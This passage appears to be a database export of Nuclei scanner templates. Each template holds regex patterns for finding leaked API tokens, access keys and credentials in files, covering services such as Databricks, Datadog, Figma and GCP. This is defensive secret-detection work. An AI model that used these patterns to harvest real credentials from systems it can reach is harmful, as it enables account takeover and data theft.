]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?artifacts[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?artifacts[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?artifacts[_-]?bucket[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?artifacts[_-]?aws[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?artifactory[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?argos[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?apple[_-]?id[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?appclientsecret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?app[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?app[_-]?secrete[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?app[_-]?report[_-]?token[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?app[_-]?bucket[_-]?perm[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?apigw[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?apiary[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?api[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?api[_-]?key[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?api[_-]?key[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aos[_-]?sec[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aos[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ansible[_-]?vault[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?android[_-]?docs[_-]?deploy[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?anaconda[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?amazon[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?amazon[_-]?bucket[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?alicloud[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?alicloud[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?alias[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?search[_-]?key[_-]?1[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?search[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?search[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?api[_-]?key[_-]?search[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?api[_-]?key[_-]?mcm[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?admin[_-]?key[_-]?mcm[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?admin[_-]?key[_-]?2[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?algolia[_-]?admin[_-]?key[_-]?1[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?air[-_]?table[-_]?api[-_]?key[\\\"']?[=:][\\\"']?.+[\\\"']\"\n - \"(?i)[\\\"']?adzerk[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?admin[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?account[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?access[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?access[_-]?key[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\\\s)*(:|=)+\"\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a00473045022100b72b69d337c25863bb7f860b4a6811ae2eefe0dd86e750fec9e74e84acbe9f61022035683b418d60d3eadb52eafc6261e03e9eb0e08e2c6f0f3d51bf38f43da64e66:922c64590222798bb761d5b6d8e72950\n", "hash": "9bbe9d87c73ca7ff71165ab9f7849cfc", "level": 1, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cdb" }, "name": "credentials.yaml", "content": "id: basic-auth-creds\n\ninfo:\n name: Basic Authorization Credentials Check\n author: gaurang\n severity: high\n description: Basic authorization credentials check was conducted.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cwe-id: CWE-200\n tags: file,keys,token,auth\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\"\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a0047304502202df27d9178759221ccfd4f42d805760dde03a437cdc608ec1f4f2db3eb89ecde022100d7db05435aaea98edaf4c7bf280ba2d6f0705d6241b5cf95a5502da2d507f8a2:922c64590222798bb761d5b6d8e72950", "hash": "2b96c5f25aa4bfc3442efe31f1c85e1c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cdc" }, "name": "databricks-api-token.yaml", "content": "id: databricks-api-token\n\ninfo:\n name: Databricks API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.go\n metadata:\n verified: true\n tags: file,keys,databricks,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - 
(?i)\\b(dapi[a-h0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100d6d700b349ee1fb96e6cd411540efe63b8889339763cbb99e050c5f818336a55022100e87d0bfb5914fdd8aeabf876d62b8cabd4ceefd2150d4f5b51fea00e13847dc6:922c64590222798bb761d5b6d8e72950", "hash": "715c1e9fc373ccab44aa8f61f818c78d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cdd" }, "name": "datadog-access-token.yaml", "content": "id: datadog-access-token\n\ninfo:\n name: Datadog Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.go\n metadata:\n verified: true\n tags: keys,file,datadog,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:datadog)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{40})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100934a76ae8d3357dca6e4451871e708a0b644e72c823623aa11e4b212b5df92d5022100df2cce06f252dc3bd0cd517ca757cf1569d1c306f51776bdf2503fe71bc9e20e:922c64590222798bb761d5b6d8e72950", "hash": "1398cfc67a64076a30b8afbd9aa0e09c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cde" }, "name": "doppler-api-token.yaml", "content": "id: doppler-api-token\n\ninfo:\n name: Doppler API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.go\n metadata:\n verified: true\n tags: file,keys,doppler,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (dp\\.pt\\.)(?i)[a-z0-9]{43}\n# 
digest: 4a0a00473045022100dc52d6b1fb23bf2c2c3c8d4d9e916c690983e2be8fab56fad96025202a66d37902200c8b8f6a353d9f716725c24c0de34f2ef15e0b3a7be7bb55442053a6f610daa2:922c64590222798bb761d5b6d8e72950", "hash": "1ebc194e8967bda12c6092b713f86187", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cdf" }, "name": "droneci-access-token.yaml", "content": "id: droneci-access-token\n\ninfo:\n name: Droneci Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.go\n metadata:\n verified: true\n tags: file,keys,droneci,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:droneci)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100b8f035e2f690ff06f1064c2fad434ef3faf43af1d86770b66ad77ecd44b93910022100fcf85bc0bcc2f473500998a866956b53f21d72f6325c80dbf3f758f0009614a2:922c64590222798bb761d5b6d8e72950", "hash": "fd98d1ae4c24f0f8debb5ccff7bf6e5d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce0" }, "name": "duffel-api-token.yaml", "content": "id: duffel-api-token\n\ninfo:\n name: Duffel API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.go\n metadata:\n verified: true\n tags: keys,file,duffel,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - duffel_(test|live)_(?i)[a-z0-9_\\-=]{43}\n# digest: 
4a0a0047304502202421c143203a023a8285876328e3581df769889a541d51b3bdcf72ab8fc117ff022100cb6b572f959e94b842ee120dd67fb14cafc499e3b4b6d4665dd07eb3e53b60f3:922c64590222798bb761d5b6d8e72950", "hash": "5093c78368b4b33e41dd432feefecad0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce1" }, "name": "dynatrace-token.yaml", "content": "id: dynatrace-token\n\ninfo:\n name: Dynatrace Token - Detect\n author: gaurang\n severity: high\n description: Dynatrace token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cwe-id: CWE-200\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"dt0[a-zA-Z]{1}[0-9]{2}\\\\.[A-Z0-9]{24}\\\\.[A-Z0-9]{64}\"\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a00473045022100ab64299fac317f6ebc2349e91b5e7fb30e50b5c612e13c00d561ee816089222602207a3b30fbfc67583401a9e652198a3dc609e1877e0f5451748c91df5ac5a1fffa:922c64590222798bb761d5b6d8e72950", "hash": "c3538027ddb46746b03a0c6fce79eb76", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce2" }, "name": "etsy-access-token.yaml", "content": "id: etsy-access-token\n\ninfo:\n name: Etsy Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.go\n metadata:\n verified: true\n tags: file,keys,etsy,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:etsy)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{24})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 
4a0a00473045022060ce8a53571f37202449c1685892f383465c312d2048578d5a202817d0611dfe022100e934a548eea41ac9818e3efffe2c9da795a395f884d4a1f10c0392de726fcf15:922c64590222798bb761d5b6d8e72950", "hash": "6ae91b7168b61cbe96749cf4aff9089a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce3" }, "name": "fastly-api-token.yaml", "content": "id: fastly-api-token\n\ninfo:\n name: Fastly API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.go\n metadata:\n verified: true\n tags: keys,file,fastly,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:fastly)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9=_\\-]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100d8441e43f35e1384e748abac2ddc93f5e90a14d06b06fb6f76e4762dcbe29ea602210095180944d4b581d9d4ee114b75f3ee2d820269c52e7da2d4d8a105f3e245a0ba:922c64590222798bb761d5b6d8e72950", "hash": "583dcea5f64384203c77afedcedbda78", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce4" }, "name": "fcm-api-key.yaml", "content": "id: fcm-api-key\n\ninfo:\n name: Firebase Cloud Messaging Token\n author: Devang-Solanki\n severity: medium\n tags: file,keys,token,fcm,firebase,google\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - '[A-Za-z0-9-_]+:APA91b[A-Za-z0-9-_#]+'\n# digest: 4a0a00473045022041f056406b85bb039bce810b2835a5ab8a446a6b6dfac1a5656b0ff7bff221f2022100b130f489cf048057110e68b3a5d891878db9a6bc0d486eb07842a6f37510479a:922c64590222798bb761d5b6d8e72950", "hash": "d13e07762f7e8bb2f6f129e2077e5805", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce5" }, 
"name": "figma-access-token.yaml", "content": "id: figma-access-token\n\ninfo:\n name: Figma Personal Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/figma.yml\n - https://www.figma.com/developers/api\n metadata:\n verified: true\n tags: file,keys,figma,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)figma.{0,20}\\b([0-9a-f]{4}-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\\b\n# digest: 4a0a00473045022100cbc7b923b9821d8b0da62a6152e2c9887062352d3f428e626da0e38bd455b6fe02201a9d7e25bc38f63682229f636ca9733c20b8de5e05453cd9ef09cda9f87186f8:922c64590222798bb761d5b6d8e72950", "hash": "b30fc24febed8b4b6dbb9f7243a85fb2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce6" }, "name": "finnhub-access-token.yaml", "content": "id: finnhub-access-token\n\ninfo:\n name: Finnhub Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.go\n metadata:\n verified: true\n tags: file,keys,finnhub,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:finnhub)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{20})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022100b50377388b15123b007f295e2b22c113fbbf59ec497c11f8245addf21da0d8a402200d62fc352af0319cc578ce82baed797de40b401a4885bd1abd5351225f01e68f:922c64590222798bb761d5b6d8e72950", "hash": "e8dc637b134803ab4cf1b2dda9ad89a3", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce7" }, "name": "firebase-database.yaml", "content": "id: 
firebase-database\n\ninfo:\n name: Firebase Database Detect\n author: gaurang\n severity: info\n tags: file,keys,token,firebase\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"[a-z0-9.-]+\\\\.firebaseio\\\\.com\"\n - \"[a-z0-9.-]+\\\\.firebaseapp\\\\.com\"\n# digest: 490a004630440220035a4d1d44e47b7b20a0944a2cfe2939806e33f5341fa5ccf188db65d7aa8e0802203d0226609d88e9be2f2c31212b32ec0a6785a3855820655cb94c95fa66f738a0:922c64590222798bb761d5b6d8e72950", "hash": "16b499279b746d542b177aae351fb9c7", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce8" }, "name": "flickr-access-token.yaml", "content": "id: flickr-access-token\n\ninfo:\n name: Flickr Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.go\n metadata:\n verified: true\n tags: flickr,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:flickr)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a00473045022100e34de1ee37b96835acda1132433eec7c4b02c2a35b1139ae4b8e5aaa38e85e5e0220612e97d89129b040693343da576a8d7eee35944a3769c76dd269f5602e0d02db:922c64590222798bb761d5b6d8e72950\n", "hash": "47d66a27eabf9f6680a1990fcb2c1264", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ce9" }, "name": "frameio-api-token.yaml", "content": "id: frameio-api-token\n\ninfo:\n name: Frameio API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.yaml\n - 
https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.go\n metadata:\n verified: true\n tags: frameio,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - fio-u-(?i)[a-z0-9\\-_=]{64}\n\n# digest: 4a0a0047304502200c5a4dfba3c1a826c28c745bd3debafd32fa105a12cd37a5c018300440233ad8022100836571fe9c99297bbbcd639faaac0f0b856d4a6049e8fcc201537c5068d7ac57:922c64590222798bb761d5b6d8e72950\n", "hash": "16e684c08b8098a74a8ec09e05114de5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cea" }, "name": "freshbooks-access-token.yaml", "content": "id: freshbooks-access-token\n\ninfo:\n name: Freshbooks Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.go\n metadata:\n verified: true\n tags: freshbooks,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - fio-u-(?i)[a-z0-9\\-_=]{64}\n\n# digest: 490a004630440220373919559ed5f79b42f4628fe2e75f9de9582f7447fdd43a711fe32f13993ece02207d990413ca61229e70e14b9d17990afbec9396475b33ba44faf734c9e4e27c16:922c64590222798bb761d5b6d8e72950\n", "hash": "7af0c969b827f01081514d83dc2d67de", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ceb" }, "name": "gcp-service-account.yaml", "content": "id: gcp-service-account\n\ninfo:\n name: Google (GCP) Service-account\n author: gaurang\n severity: low\n tags: file,keys,token,google\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"\\\"type\\\": \\\"service_account\\\"\"\n# digest: 
4a0a00473045022100cb6dcfa7dcc1544a9d22b921bfe6ea06c853f81c2dba5230df89bb222cded8390220220342a2699d75a6104f3af08f65b6bc97b873889fadf53fb7214b9b712dd5f2:922c64590222798bb761d5b6d8e72950", "hash": "675ea01bbc90275b01bb3c95f5018075", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cec" }, "name": "gitter-access-token.yaml", "content": "id: gitter-access-token\n\ninfo:\n name: Gitter Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.go\n metadata:\n verified: true\n tags: gitter,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:gitter)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9_-]{40})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a00473045022024b31fc9eb1fabba2e0853bff3057754737098dce170f37dae5b48e451e37adf022100cadc0986bb67a10f42b716e69921383c00f6e61fdc87f2bfded8780288c024c5:922c64590222798bb761d5b6d8e72950\n", "hash": "7f01e144536d3f93b07f8002ac90ad45", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ced" }, "name": "gocardless-api-token.yaml", "content": "id: gocardless-api-token\n\ninfo:\n name: Gocardless API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.go\n metadata:\n verified: true\n tags: gocardless,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:gocardless)(?:[0-9a-z\\-_\\t 
.]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}(live_(?i)[a-z0-9\\-_=]{40})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 490a004630440220155e107b0ad06304b29f2c77174e43f1a746c7a1919c6db1b92f8cdfdd9fde4702203b452239f0686864410852dc04f7f1f2ab9605ce5fd6f625f2f2a92d5c4bfe64:922c64590222798bb761d5b6d8e72950\n", "hash": "4993e24b5e133b92cb54922ccd5a9778", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cee" }, "name": "hashicorp-api-token.yaml", "content": "id: hashicorp-api-token\n\ninfo:\n name: Hashicorp API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.go\n metadata:\n verified: true\n tags: hashicorp,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)[a-z0-9]{14}\\.atlasv1\\.[a-z0-9\\-_=]{60,70}\n\n# digest: 